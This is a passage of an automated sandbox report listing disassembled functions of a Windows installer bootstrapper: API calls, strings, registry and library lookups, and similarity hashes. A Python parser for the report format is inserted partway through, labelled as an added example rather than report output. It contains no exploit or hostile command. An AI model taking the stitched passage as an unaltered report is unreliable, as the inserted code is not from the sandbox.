• RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
• RegDeleteValueW.ADVAPI32(00020006,00810D10,00000000,?,?,007CF335,00000000,?,00020006,?,00810D10,00020006,00000000,?,?,?), ref: 00801557
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Value$Delete
• String ID: regutil.cpp
• API String ID: 1738766685-955085611
• Opcode ID: e9beeee41d1ef24f6a7cd6699862c443edf1318391bf08c00a5ab0d09cb7883c
• Instruction ID: 2fb3ad103f8be5d9f040993c8fa36e5ff491bcba3c891dfc26019ace7fd9f6e6
• Opcode Fuzzy Hash: e9beeee41d1ef24f6a7cd6699862c443edf1318391bf08c00a5ab0d09cb7883c
• Instruction Fuzzy Hash: A111A33795113AB7DF614A948C0DBAA7A64FB44B70F154225BE02FE1D0E731CD2097E0
APIs
• CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,007E7691,00000000,IGNOREDEPENDENCIES,00000000,?,0080B518), ref: 007CDE04
Strings
• Failed to copy the property value., xrefs: 007CDE38
• IGNOREDEPENDENCIES, xrefs: 007CDDBB
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
• API String ID: 1825529933-1412343224
• Opcode ID: 4fb2c0cea7283495e7986754da3c83255585ff8caab1a2a6df30294251a5ef63
• Instruction ID: 545eb2dc6d1f9a4482ec237f973e892e8751459b8fb7c338d193235ef3e987e3
• Opcode Fuzzy Hash: 4fb2c0cea7283495e7986754da3c83255585ff8caab1a2a6df30294251a5ef63
• Instruction Fuzzy Hash: 2411E332604215AFCB215FA4CC89FAA77A6AF54320F25417EEA199F291C7749C50CA80
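The function blocks above all share one fixed layout: an "APIs" list of call sites (with nested "Part of subcall function" entries), a "Strings" list of xrefs, memory-dump metadata, and a "Similarity" section whose String ID joins several strings with "$". The Python below is an example added here; it is not part of the Joe Sandbox report or of the analysed sample. It parses that layout into records and pulls out what a triager reads these blocks for: which call sites touch the registry APIs, which DLL names the code references, and the individual String ID entries. The SAMPLE text is constructed from entries in this report with the long argument lists shortened; argument splitting on commas is a simplification that would break on a string argument containing a comma.

```python
# Added example, not part of the Joe Sandbox report or of the analysed sample:
# parse the IDA-plugin function blocks ("APIs" / "Strings" / "Similarity") into
# records for triage. SAMPLE is constructed from entries in the report above,
# with the long argument lists shortened, so the parser runs offline.
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE = r"""APIs
• WideCharToMultiByte.KERNEL32(0080B518,00000000,00000006,00000001,comres.dll,?,00000000,?), ref: 007F67A3
• GetLastError.KERNEL32 ref: 007F67BF
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide
• String ID: comres.dll
APIs
  • Part of subcall function 00808E44: lstrlenW.KERNEL32(00000100,?,?), ref: 00808E69
• RegCloseKey.ADVAPI32(00000000,?,?,00000000,wininet.dll,?), ref: 0080907A
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,80000002,00020019,SOFTWARE\Policies\,00000000), ref: 00800F80
Strings
Similarity
• API ID: Close$EnumInfoOpenQuerylstrlen
• String ID: wininet.dll
APIs
• CompareStringW.KERNEL32(00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000), ref: 007CDE04
Strings
• Failed to copy the property value., xrefs: 007CDE38
• IGNOREDEPENDENCIES, xrefs: 007CDDBB
Similarity
• API ID: CompareString
• String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function ADDR: ]Api.MODULE[(args)], ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
XREF_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")  # "• Key: value" lines

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]          # raw arguments; "?" marks a value IDA could not resolve
    ref: str                 # address of the call site
    subcall_of: str | None   # address of the nested function for indirect calls

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref address)
    meta: dict[str, str] = field(default_factory=dict)            # dump/plugin/similarity keys

def parse_blocks(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per 'APIs' block, in report order."""
    records: list[FunctionRecord] = []
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTIONS:
            if stripped == "APIs":        # every function block opens with its APIs list
                records.append(FunctionRecord())
            section = stripped
        elif not records or not stripped:
            continue                      # text before the first block, or a blank line
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m.group("args")
            # naive split: a string argument containing a comma would be split too
            records[-1].apis.append(ApiCall(m.group("api"), m.group("mod"),
                                            args.split(",") if args else [],
                                            m.group("ref"), m.group("sub")))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            records[-1].strings.append((m.group("text"), m.group("ref")))
        elif section not in ("APIs", "Strings") and (m := KV_RE.match(line)):
            records[-1].meta[m.group("key")] = m.group("val")
    return records

def string_ids(rec: FunctionRecord) -> list[str]:
    """Entries of the Similarity 'String ID', which the report joins with '$'."""
    sid = rec.meta.get("String ID", "")
    return sid.split("$") if sid else []

def calls_into(records: list[FunctionRecord], module: str) -> list[tuple[str, str]]:
    """(api, call-site) pairs for every call into `module`, nested subcalls included."""
    return [(c.api, c.ref) for r in records for c in r.apis if c.module.upper() == module.upper()]

def library_names(records: list[FunctionRecord]) -> set[str]:
    """DLL names seen either as String IDs or as literal API-call arguments."""
    names = set()
    for r in records:
        for s in string_ids(r) + [a for c in r.apis for a in c.args]:
            if s.lower().endswith(".dll"):
                names.add(s.lower())
    return names

if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    for i, r in enumerate(recs, 1):
        print(f"[{i}] {r.meta.get('API ID')}: {[(c.api, c.ref) for c in r.apis]} strings={string_ids(r)}")
    print("registry calls:", calls_into(recs, "ADVAPI32") + calls_into(recs, "KERNELBASE"))
    print("DLL names referenced:", sorted(library_names(recs)))
```

Run against the full report text instead of SAMPLE, the same three helpers give a quick map of which functions open, enumerate or write registry keys and which library names the binary resolves by string, without reading every block by hand. The "?" placeholders are kept verbatim because IDA could not resolve those arguments statically; they are not data to match on.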
APIs
• Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,007D8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0080566E
• SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007D8E97,?), ref: 00805689
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: InfoNamedSecuritySleep
• String ID: aclutil.cpp
• API String ID: 2352087905-2159165307
APIs
• LCMapStringW.KERNEL32(0000007F,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?,007C2318,00000000,00000000), ref: 007C15D0
• GetLastError.KERNEL32(?,007C2318,00000000,00000000,?,00000200,?,008052B2,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007C15DA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastString
• String ID: strutil.cpp
• API String ID: 3728238275-3612885251
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 007D57D9
• CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 007D5833
Strings
• Failed to initialize COM on cache thread., xrefs: 007D57E5
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: InitializeUninitialize
• String ID: Failed to initialize COM on cache thread.
• API String ID: 3442037557-3629645316
APIs
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
• RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00803A8E,?), ref: 00803C62
Strings
• EnableLUA, xrefs: 00803C34
• SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00803C0C
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseOpen
• String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
• API String ID: 47109696-3551287084
APIs
• lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,007C1104,?,?,00000000), ref: 007C5142
• CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,007C1104,?,?,00000000), ref: 007C5172
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareStringlstrlen
• String ID: burn.clean.room
• API String ID: 1433953587-3055529264
APIs
• SysFreeString.OLEAUT32(00000000), ref: 00806985
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: FreeString
• String ID: `<u$atomutil.cpp
• API String ID: 3341692771-4051019476
APIs
• GetCurrentProcess.KERNEL32(?), ref: 007C6534
  • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
  • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
  • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
  • Part of subcall function 007C5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5D68
Strings
• Failed to get 64-bit folder., xrefs: 007C6557
• Failed to set variant value., xrefs: 007C6571
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to get 64-bit folder.$Failed to set variant value.
• API String ID: 3109562764-2681622189
                                                                                                                                                              • Opcode ID: 591fe7d531d4b9572dc46e0d97efce67910cdf88fdf1df432c2841a9b9e62753
                                                                                                                                                              • Instruction ID: 351f97cb894073a869782db029fcb97e17b05ee76c6cec201e995c55174f6812
                                                                                                                                                              • Opcode Fuzzy Hash: 591fe7d531d4b9572dc46e0d97efce67910cdf88fdf1df432c2841a9b9e62753
                                                                                                                                                              • Instruction Fuzzy Hash: 07018F32D01228BBCB21AB94DC06E9EBB78FF04720F204159B800A6184D7759F609BD1
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
• GetLastError.KERNEL32(?,?,?,?,007C10DD,?,00000000), ref: 007C33FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: pathutil.cpp
• API String ID: 2776309574-741606033
• Opcode ID: 5ca5c6770efe9c03029f3a57c19f17852ce466c2987aae5ee8af059060268916
• Instruction ID: 56d35cc3dc91c6556bfb0d5b284f030e398edc2ae7c5c29af2234ade4b3d5eec
• Instruction Fuzzy Hash: 35F0C273A41571A7C73256965C49F9BFB58EB46B70B16813DFD04FB240DA69DE0082F0
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 007EEBD2
  • Part of subcall function 007F1380: RaiseException.KERNEL32(?,?,?,007EEBF4,?,00000000,00000000,?,?,?,?,?,007EEBF4,?,00827EC8), ref: 007F13DF
• __CxxThrowException@8.LIBVCRUNTIME ref: 007EEBEF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 2114cc3b1ea8dcec90faedb883fc2cbab229301f7a1124c4120e55596843a7f0
• Instruction ID: 0443de77a4cf2b002ba007a9e0403b525ccb4d37ec0445ea4edd27be4ede6528
• Instruction Fuzzy Hash: 91F0287580120CF7CB00BAA6E80AD6D332CAE04310B904960F924D25D1EB38E955C5D0
APIs
• GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,007CBA1D,?,?,?,00000000,00000000), ref: 00804A1D
• GetLastError.KERNEL32(?,?,?,007CBA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00804A27
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastSize
• String ID: fileutil.cpp
• API String ID: 464720113-2967768451
• Opcode ID: efd8b2a1e6a563236b007dccbefb9595427851e3dd4a03aeadbdbf1f6a13a3b0
• Instruction ID: 1c5db9aaa9eb852185623ddfaf1b4dba0f021056795c2141be5bbb7b5bec112e
• Instruction Fuzzy Hash: 67F08CB2A8023AABD7209B899D0595AFBACFF44B20B01411ABE44E7340E770AD1087E4
APIs
• GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800E28
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressProc
• String ID: AdvApi32.dll$RegDeleteKeyExW
• API String ID: 190572456-850864035
• Opcode ID: 77b704941546958e6e80ab821b25ed23fde9b95263081c85c7c0999ef74330f9
• Instruction ID: 47201b6a8bf98d234c50b4a9ecc798277ecdfda060d8ee57b4ea432e341c7fce
• Instruction Fuzzy Hash: 0CE0EC715032619BC7719B14FC09B417F91F731B58F04C125E415EA6B0D3BA4891CF90
APIs
  • Part of subcall function 00A033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00A010DD,?,00000000), ref: 00A033E8
• CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00A010F6
  • Part of subcall function 00A01175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A01186
  • Part of subcall function 00A01175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A01191
  • Part of subcall function 00A01175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A0119F
  • Part of subcall function 00A01175: GetLastError.KERNEL32(?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A011BA
  • Part of subcall function 00A01175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A011C2
  • Part of subcall function 00A01175: GetLastError.KERNEL32(?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A011D7
• CloseHandle.KERNEL32(?,?,?,?,00A4B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00A01131
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
• String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
• API String ID: 3687706282-3151496603
• Opcode ID: 5dfb236f7705cff101f6803545b51e7d84bcea58a6f84d3197ba9b72b7342c4a
• Instruction ID: 2317cdf8f43bda91ab1380d0896b73d1741a0d1ba823c40b453edf962c23f1c4
• Instruction Fuzzy Hash: F0218075D1021CABCB10DFB4ED45BDEBBB8AB89720F104219EA11B72C1D7709904CBB0
APIs
• EnterCriticalSection.KERNEL32(00A6B5FC,00000000,?,?,?,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FEF4
• GetCurrentProcessId.KERNEL32(00000000,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FF04
• GetCurrentThreadId.KERNEL32 ref: 00A3FF0D
• GetLocalTime.KERNEL32(8000FFFF,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FF23
• LeaveCriticalSection.KERNEL32(00A6B5FC,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A4001A
Strings
• %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00A3FFC0
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
• String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
• API String ID: 296830338-59366893
• Opcode ID: 54ff186a35fa97c9c682bb58e3a98f72cd2c11b9781f849a1467d731a7738848
• Instruction ID: 6b64ad13c3a27b9e6c3c7532a0fc69f19b271c389622eb71746affeb77b0cbd2
• Instruction Fuzzy Hash: 13416E79D11219AFDB21DFE8DD05ABEB7B8EB88B11F000525F901E6290D7358D81DBA1
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to calculate working folder to ensure it exists., xrefs: 00A1A0D8
                                                                                                                                                              • Failed create working folder., xrefs: 00A1A0EE
                                                                                                                                                              • Failed to copy working folder., xrefs: 00A1A116
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                              • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                              • API String ID: 3841436932-2072961686
                                                                                                                                                              • Opcode ID: cc7bdd57f81a9a20f7325ade880479e901bbc34fd974065ff52f522c8d061e12
                                                                                                                                                              • Instruction ID: 1092be10da9af8c068bc3381324924adf18c06c6048e3c73692c33d0443dfd7f
                                                                                                                                                              • Opcode Fuzzy Hash: cc7bdd57f81a9a20f7325ade880479e901bbc34fd974065ff52f522c8d061e12
                                                                                                                                                              • Instruction Fuzzy Hash: B0018832D02528F78B225B59DD06CDEBB79EF94721B504355F80076111DB319E40A691
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00A0E058
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00A0E736
                                                                                                                                                                • Part of subcall function 00A0394F: GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
                                                                                                                                                                • Part of subcall function 00A0394F: RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                              • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                              • API String ID: 336948655-2953049543
                                                                                                                                                              • Opcode ID: 96d09cfd6647bc5edf0e3a90a38c18a3d074fffae51e67cf20b7abee3f678c7d
                                                                                                                                                              • Instruction ID: 1d625da7345dabc31d240f052ee5a54ebd58c226074b13c394dadb309dc10f24
                                                                                                                                                              • Opcode Fuzzy Hash: 96d09cfd6647bc5edf0e3a90a38c18a3d074fffae51e67cf20b7abee3f678c7d
                                                                                                                                                              • Instruction Fuzzy Hash: 3232C232D4022ABBCB11DFA4ED41FAEB6B4BF14721F114A65F911BB2D0D771AD10AB90

                                                                                                                                                              Control-flow Graph (graph image and raw node/edge data not reproduced)
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
